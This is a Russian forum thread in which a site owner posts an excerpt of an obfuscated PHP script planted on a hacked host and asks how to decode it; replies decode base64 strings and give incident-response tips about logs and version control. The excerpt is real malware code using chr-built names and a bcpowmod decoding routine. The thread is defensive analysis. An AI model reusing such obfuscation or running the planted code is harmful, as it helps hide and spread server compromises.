Расшифровка вредоносной программы на php / PHP, Perl, Python

ReSQL.ru

2.0.60

Полная версия Контакт Правила FAQ Помощь

Гость

Войти | Профиль | Очистить

Нов. | Гор. | Избр.

Написать

Автор*:

Ввести пароль для входа

Тема*:

Сообщение

Данное сообщение тематическое

Сообщение содержит картинки или видео 18+

Автор:

ВНИМАНИЕ! На данном подфоруме действуют строгие правила. Удостоверьтесь, что ваше сообщение соответствует им!

Форум или тема закрыты для гостей. Необходима авторизация!

Загрузить последнюю сохраненную версию

Вставить как галерею

Максимальный размер вложений: 4,0 МБ, аудио/видео: 8,0 МБ. Картинки большего размера ужимаются, если возможно.

Введите код, изображенный на картинке. Если код нечитаемый, кликните картинку, чтобы загрузить другой вариант.

Отправляя сообщение, я выражаю свое согласие с правилами форума и принимаю пользовательское соглашение.

Действия ...

Доб. в избранное
Игнор. тему
Прикреп. тему
Пометить прочит. / непрочит.
Фильтр:
Сообщения автора темы
Сообщение содержит вложения
Сообщение содержит картинки
Сообщение содержит видеоклипы
Сообщение содержит аудиоклипы
Сообщение содержит картинки или видео 18+

Форумы / PHP, Perl, Python [игнор отключен] [закрыт для гостей] / Расшифровка вредоносной программы на php / 6 сообщений из 6, страница 1 из 1

31.07.2013, 13:49

#38350154

Oldwin

Участник

Сообщения: 110
Рейтинг: 0 / 0

Расшифровка вредоносной программы на php

Всем привет. Поломали тут хостинг и закинули скрипт на PHP, который весь наглухо зашифрована каким-то неизвестным мне бредогенератором. Имеет кучу строк, ниже часть из них. Кто подскажет чем ее так лихо зашифровали и где бы взять дешифратор? =) Цель - понять что скрипт делает, и откуда эта зараза пришла.

Код: php

1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
20.
21.
22.
23.
24.
25.
26.
27.
28.
29.
30.
31.
32.
33.
34.
35.
36.
37.
38.
39.
40.

$mXD6kuhGw = array('Q29ud'.'GV'.'udC1Ue'.chr(88)."B".chr(108)."O".'i'.chr(66).chr(104)."c"."HBs"."aWN".'hdGl'.chr(118)."bi".'9'."6aXA=");$picties_0 = array('he'.chr(97)."der",chr(98).'W'.chr(86)."t"."b3J5".'X'.'2x'.chr(112).chr(98).'W'.chr(108).chr(48),"Ynpj".'b21wcm'."Vzcw==",'c2'.chr(70)."mZV9tb2"."Rl",'Ynpjb21wcmV'."zcw=".chr(61),"bWF4X2"."V4Z".'WN1d'."G"."lv"."b".'l90aW1l');$Manity_59 = array('or'.'d','b'.'cpowmod',"b".'c'.chr(109).'ul',"set_t"."im".chr(101)."_limi"."t","ZG".'VmYXVsdF9zb'.chr(50)."NrZ".chr(88)."R".chr(102)."d".'G'.'l'.chr(116).'ZW91dA'.chr(61)."=","pow","str".'l'.chr(101).'n',chr(98)."c"."add","MA=".'=');
$Unsexes = array('Ym'.'N'.chr(119).'b'.'3dtb2Q=','is_'.chr(99).'a'."l".chr(108)."a".chr(98).'le');
....
 function Irlanges($Picte, $Overformible_94, $Formfuling2029)
{	

$misexantes_39a = chr(98).'ase6'.chr(52).'_decode';
$Formitying = array("chr");
$Clos_21 = array(chr(111)."rd","p".chr(111).'w');

$formtioning42af = array("M"."A=".chr(61),"s"."u".'b'.chr(115)."tr",'s'."t"."r"."len");$Ownce = array('c'."ei"."l");

  $ownive_a8  = '';


  $subformivees = 3;

  $Procesioned = $Ownce[0]($formtioning42af[2]($Picte) / $subformivees);


  for($posibles = 0;

 $posibles < $Procesioned; ++$posibles)
  {
    $Imlangies = $formtioning42af[1]($Picte, $posibles*$subformivees, $subformivees);
    $pictiesf1   = $misexantes_39a($formtioning42af[0]);


    for($h3d4Pdc = 0;
 $h3d4Pdc < $formtioning42af[2]($Imlangies); ++$h3d4Pdc)
      $pictiesf1 += ($Clos_21[0]($Imlangies[$h3d4Pdc]) + 1) * $Clos_21[1](256, $h3d4Pdc);


    $pictiesf1    = Returning(Formsedfb2($pictiesf1, $Overformible_94, $Formfuling2029), 255);
    $ownive_a8 .= $pictiesf1.$Formitying[0](255);	  
  }

  return $formtioning42af[1]($ownive_a8, 0, -1);
	
}

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

31.07.2013, 14:28

#38350237

vkle

Участник

Откуда: Самара
Сообщения: 14 253
Рейтинг: 0 / 0

Расшифровка вредоносной программы на php

Oldwinгде бы взять дешифратор? =) Цель - понять что скрипт делает
Ручками расшифровывать, или eval'ом, только аккуратно ;-)

Код: php

var_dump($mXD6kuhGw, $picties_0, $Manity_59, $Unsexes);

Выдает:

Код: php

1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
20.
21.
22.
23.
24.
25.
26.
27.
28.
29.
30.
31.
32.
33.
34.
35.
36.
37.
38.
39.
40.
41.
42.
43.
44.

array(1) {
  [0]=>
  string(40) "Q29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi96aXA="
}
array(6) {
  [0]=>
  string(6) "header"
  [1]=>
  string(16) "bWVtb3J5X2xpbWl0"
  [2]=>
  string(16) "Ynpjb21wcmVzcw=="
  [3]=>
  string(12) "c2FmZV9tb2Rl"
  [4]=>
  string(16) "Ynpjb21wcmVzcw=="
  [5]=>
  string(24) "bWF4X2V4ZWN1dGlvbl90aW1l"
}
array(9) {
  [0]=>
  string(3) "ord"
  [1]=>
  string(8) "bcpowmod"
  [2]=>
  string(5) "bcmul"
  [3]=>
  string(14) "set_time_limit"
  [4]=>
  string(32) "ZGVmYXVsdF9zb2NrZXRfdGltZW91dA=="
  [5]=>
  string(3) "pow"
  [6]=>
  string(6) "strlen"
  [7]=>
  string(5) "bcadd"
  [8]=>
  string(4) "MA=="
}
array(2) {
  [0]=>
  string(12) "YmNwb3dtb2Q="
  [1]=>
  string(11) "is_callable"
}

Там несложно угадать php-шные функции, куски чего-то в base64. Так дальше и двигать...

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

31.07.2013, 14:33

#38350251

vkle

Участник

Откуда: Самара
Сообщения: 14 253
Рейтинг: 0 / 0

Расшифровка вредоносной программы на php

Oldwinи откуда эта зараза пришла.Классические способы распространения - это скомпрометрованные реквизиты доступа FTP/SSH и незакрытые уязвимости используемых скриптов.

Смотрите время/дату файлов с этим кодом. Далее, зная время/дату смотрите логи FTP и SSH-авторизации, логи доступа и ошибок вебсервера.

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

31.07.2013, 14:36

#38350257

vkle

Участник

Откуда: Самара
Сообщения: 14 253
Рейтинг: 0 / 0

Расшифровка вредоносной программы на php

Код: php

base64_decode($mXD6kuhGw[0])

Дает на выходе

Код: php

Content-Type: application/zip

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

31.07.2013, 15:54

#38350422

st_st

Участник

Откуда: Tasm 5.0
Сообщения: 2 360
Рейтинг: 0 / 0

Расшифровка вредоносной программы на php

Дату обновления файлов вирусы обычно не меняют (точнее после модификации файлов дату ставят прежнюю - зависит от запрета выполнения некоторых функций в php.ini и самого вируса), поэтому найти его среди сотен/тысяч файлов php - задача ещё та, хотя иногда получается довольно быстро поиском по файлам на предмет base64. А что вирус делает - никогда не разбирал, трата времени.

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

31.07.2013, 16:54

#38350548

Hett

Участник

Откуда: Бийск, Новосибирск
Сообщения: 13 075
Рейтинг: 0 / 0

Расшифровка вредоносной программы на php

Надо проекты на серверах версионировать, тогда банально тот же git status, например, покажет что изменено :)

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

Читали тему (0):

Читали форум (0):

Пользователи онлайн (0):

start [/forum/topic.php?fid=23&tablet=1&tid=1463569]:	0ms
get settings:	11ms
get forum list:	20ms
check forum access:	3ms
check topic access:	3ms
track hit:	50ms
get topic data:	13ms
get forum data:	3ms
get page messages:	56ms
get tp. blocked users:	2ms
others:	281ms

total:	442ms